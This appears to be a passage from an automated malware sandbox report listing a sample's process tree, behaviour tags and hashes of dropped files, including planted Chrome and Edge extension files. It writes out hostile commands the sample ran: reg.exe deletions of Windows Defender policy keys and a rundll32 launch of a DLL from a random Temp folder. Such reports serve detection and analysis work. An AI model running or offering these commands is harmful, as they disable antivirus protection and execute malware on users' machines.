C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:4240
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:321⤵PID:3228
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1060
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:4652
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Drops file in Windows directory
PID:836
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:641⤵PID:1188
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\zlCauFJzutozcZAJ\vorQKlVs\HXnMzdU.dll",#1 /tBsite_idCkx 5254031⤵PID:2968
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD512f3bc3d66bce89946cdd64df2965ea4
SHA1725b393ec3b6c639a1424c00d18ad89290b707b7
SHA25632d61f0a0cdd3ff8bf6a7a5017a3cd96df6ada08c52df37b0fdb770933bf5ac7
SHA51293b67247328743e2fa5294f1b4b0fb26eb031eb3b059acf2653e46ca76f150867ee6e973e12acb95ce05746dbe97dd137080beb5e5b648c5d275621d829888dc
-
Filesize
2KB
MD519c0421d0f2e2d8612ef4b0637aee209
SHA1e810beeecd4ea33461778fdd8a41309cd505676f
SHA256f33efb4faa4de2da6ba84e053193896503390fa6a4d57f220ac8f968d79683b1
SHA512eb7d835ed904541638fd628fa20523c34d4aba7c2102cfc9761ffb151c9fdc5e94438104ce88e5ad4816e4bded53f38965318c716521f25e1e970de7d9c7aaa8
-
Filesize
2KB
MD56c2cee2499aa588bb5f29a97e40c5285
SHA112cfed116f05321267b8201f2db2c999371256cc
SHA2566f1cfc21538669c1231ce07e4b6b9242d191e131bd0e93628f85b9ba9194d8cf
SHA512d54f0e8846ae6ecefc7bc6047b684205765ababee88c997fdba900a0d06268609d599c70e92b5a8220460e9de479bd7aa18c049364c6463aeb77c0b7d8ee2c68
-
Filesize
2KB
MD5515d9f58472daa8b0021b82f4c47db45
SHA1028d9a8c4c0599951d712360e9b6656e8f5b1771
SHA256a1b05a8e5347b8aea238c263bdb207950a7a61f1cf437e5e974ee3631c476ec3
SHA5122051d0c8339d036327fcbd5bdc7d466a0472006b5aa6991ccb60546fef56d80569dc2c31544f32be9bd19f48fc11dcd50dfaac517dd6280c8a5a39821cef9f7b
-
Filesize
239KB
MD55cea067f8db4f83e999e078e520ee197
SHA13cf6dffba50d80c50b7606568a7241b3c7c1a6de
SHA2565bf4e37757754bc256a7594a1e19cd25660d1e5008d670c67cbfc4b4487b96ea
SHA512d5c2cb8ace2e099e9dd7350ca228908d4b3e82176795512a907c46136d764e4a05a6256c1434ee8de3687fdee2e16597d32107331401f902d0eb77cbbee616d5
-
Filesize
2KB
MD5ed93190496a6dbb711fe99352d2c0f51
SHA14048a36b9cf164b90c4b8a0398555f6b55653558
SHA2566e391c3fff651f9b6d7c5ab3ea8626dca05720be7f744a4392709c7feaa46190
SHA512ef292ac01100a6ea2177422429462ef47c7409d44da2557ae0e086456df496e5c024c79e52972c03f2442a707f6176d3fbb3fa9823477d118d8b9d533353436c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5fafa7ac5b92e71eab5d8e2786b2af656
SHA19cb9bf4787d5b7364c1458a31e94738a9cdfae80
SHA25681480e93b7a45b4f591fb1cb7101e91d498ca77571af89e211d2822c852bdce1
SHA5122ce71fc0988e3de28d60b5887cd4078fef8e898dd7b3b2f5e06f3eea70d252691a33f80606c78732f8c2db0f1356e5b3175df302cad07b7697226440b598191f
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\abgdohlnibdejcajjfmngebmdanjldcc\1.2_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
9KB
MD5df9ee99b5541a817793e76137f2a9ad3
SHA186bc9e635e99c8bccd55e9a07e7a27e6f1708296
SHA25692b7d51f18cb6410a3f098abf46e9c9d49e01f4899469c937d5ca8cd7e5ba414
SHA512c9a54cc6d2cdd1871da9384388535dd8fe3c79326106e69520c92f0fb1c6d20a966773ec23d506c37af0f2ff25a16fca9753830082f0d9295ac75a74e0f8ca51
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
1.8MB
MD560cbb4b682e728c7393d7d25ffafd9b2
SHA1582688c65ab39f61b96afbb8d6b1cf3480078802
SHA2562093726bd0c5c1245cbd01b3af7a6ccf140da56f1687703a3f9ddb457d17731c
SHA5125c126cff1f549f4b490a88803cbbd224fdbd39197a831f490314d0160c9670041531c92a08bf0ab7b063d54759a4de32ec6ed05cde9c099dda89c9cc6836efc4
-
Filesize
1.9MB
MD5868184d4e2bc06fe3bb849c50ef78bff
SHA11d47783b94a10fe7961d24aad70519074eabaeed
SHA2567df50f0915fe51f130b865c7d535be7ff9b738965d514074a3e714502012f4d8
SHA5121e0918981a7a8233f102d56ac0437131079a59ead873045c4caf72298486df7c9e6bdd549988fff9e60e16035d202ceff9962e6fea54b304773af62943c54b10
-
Filesize
1021KB
MD55e6f30cf9a199a89c4a44c0448af6c91
SHA1aec753e49c10861adf6048047beea80dbe2c4768
SHA256e556cf074d98f9a6249bf3f35a92c741b19f379090cf80d2633f5a93bdfd8283
SHA512ae2c767e9638408178fb061c5e4c68fced551a39a5eff549f5ac71db16f3496e85b9953f1a90b80fedc70c95c77bf5acbc77860d5a1b0e72f91b9aa7a8b19796
-
Filesize
88KB
MD53fb0129edbbc4d02923b4088ed9a059e
SHA11058f83a0ef72ca8b98748444abe85318386a0e4
SHA2568bceef9f732dc07645d2fa959f4413c8800f4bfd8d363893191bf2b224177959
SHA5121cca78cbd44c302baa4d47cf120009d1774f3d1cc6c645407c2c33c5b150bb9123ff7f81a7083978ecf7ddef66dee64a6dd600e390aa2cb6612308939cd18f03
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
151KB
MD5a206d7682f73502553d8b8ab59d67964
SHA1b3495f942a75f1838965421709d1cc9a880859ea
SHA2561606150edfd864e0c46970719b7c0b4bf16c1c9d06d378db0449e5da47ef7d2e
SHA5127398e0b87c550f96624e293beb47d8c74f8baa50d1f9de1a91b611db527823bcb27aade475d63530e8cd132f650dbe3755b9fc1441e82628d60790ff5afa4d4e
-
Filesize
86KB
MD558e0bc96943228b9973ac98bdcd9b52b
SHA131d13374c0c0c7d0501dfdfa0368816ff568ebce
SHA25647241bb3631e9328eacc2352bc243eac40244e11523d75c2cbbf0865c2157ac0
SHA5124dd1bf23c3fb5b3f849826afea691bbb6611d625f1b77c76d8a909f1cea57aa7c46c481bdf0b824d6b5dc128f04e46d2c3b6674f66269c287a23599e889f7b64
-
Filesize
6KB
MD564fdd7d874f535355d28bcfd0f0b7d0b
SHA11607de41d53a9810036b643ae7b10e1ec244f809
SHA2563b0df733db2e8c94eb83eeaead3abd2ab45d6497667067669f06dffa13d3a035
SHA5122484b259fe179082695f30fb1693049612c6c0eabfe755c9e43de3c9a037927ddd2d252782f2f2a8f7541c935a0170bb94ef4eb09cd82e3d1f159206e1ccbb51
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5fdf99f3f663bd1dc3b8d839e5ed1a1d6
SHA10b23c7bf7b7536d770d980c0334ac2a3e8a03361
SHA256e8b9fdf2acd8943c16985b3c44627b396895d793dddbc45502cb3ba243b2e536
SHA512f7aa5b9aa65d8dbfa0ad5b9e6a831b198a9b502457d03edeb03941fc98318c37df5b51013bdc62fc0c4c907c3847459255f7e6f42e7903725068e341f0227c66
-
Filesize
216KB
MD5b53ac14d3b1ea76140d16b2bf14c0baa
SHA18daf83bacf17b2a9c8b14cfeb3e65f60400e78d2
SHA256f133f3a9902c53fd3dfe244f960efd77f993fc8d081274bc67a5155c93efde51
SHA512d279869f5cf02f6d0775967d17269774bdec865eeea1233abaff2ba7193eb22f4a637f31fbb18534482eb29de8af692d6a962d21de26829ef46a04a8860c0ee3
-
Filesize
202KB
MD5fdf0baf32da9e2694ff9ce61b7535781
SHA160f1450a50ce14af49aa424b1aaa709c58dd9682
SHA25600dc441d5908c8278754974832807ba3cdc9cac49774bb96a9de690dc90e52f4
SHA5121a1649369b0fe2c54d125fc6b8bf339db399908ebbb37e6fdd3bc028dddfdc87c08879abd73ab934f85c5329c4bdf65ca511446b458582f61596b0214885e999
-
Filesize
128KB
MD52f1fe06ad81a253189c14ed28e44a1f3
SHA134593175c3e145200363559469dc84db0e0ef3e1
SHA256fe5819fd23895531a2a0bd5ca402cfd1f99de1d5098d48d359bdffe590664505
SHA512bbd6fb9203af9ea20ac123054249bb12a6887bb0945817a219c39338ff0a18dc64959ed0674184d097ddcaf0dcd3510f04ec48b28792ea3c6b15dbc2f747dcad
-
Filesize
78KB
MD54dbdea43bf2d11f4dd7c3b38f6e3c4dc
SHA1db84a820dc882c506b0e4f13691fa874ddcdd6a6
SHA256c0c938086da5424b80dd5a6586a0518115c6b721109ade09d76baea9f84f8394
SHA5123fbd58e18fe160653a239274cdcf86e801467737b4af48578fe999ffc824e192f3fe4367036d86ae8380e49955ff48d1a2fd6e873f67b0a477e89abe244d174d
-
Filesize
107KB
MD5bf14efc6fe4098cd0deda76bc1b44d79
SHA103480f9f50c8671e15a23f643cd27fa865563d39
SHA2569dcf4580df150a4d9b060aa00ee4a486a7f3af715edb97e89c62dd2bd38aa805
SHA5122ca956d9e50ba7e7778c44ac602fe2549cc84240bad2280ae56cadf4246e2cbcc3f4b88799d77f79f64c78038cd0433083255c23ca77168607c0188086c53bc6
-
Filesize
6KB
MD53763fb04740bc20a4c3d141bf819f5ed
SHA15f568d5d23ccc0a7f6e7b7ec907d6e9877ed0c3d
SHA2561d87f75129a41d56ccf385c10ee1543261c43f90f4f0b872ea0008d832efc520
SHA5121e1a60e55ba7130383286934a8fe6087f8522048d8255f2e86464e51ce05a9f1b5aabeeb2c04f6c41b9cbaaf85a475199a5cfa29593cef1da902c89d090f7375
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732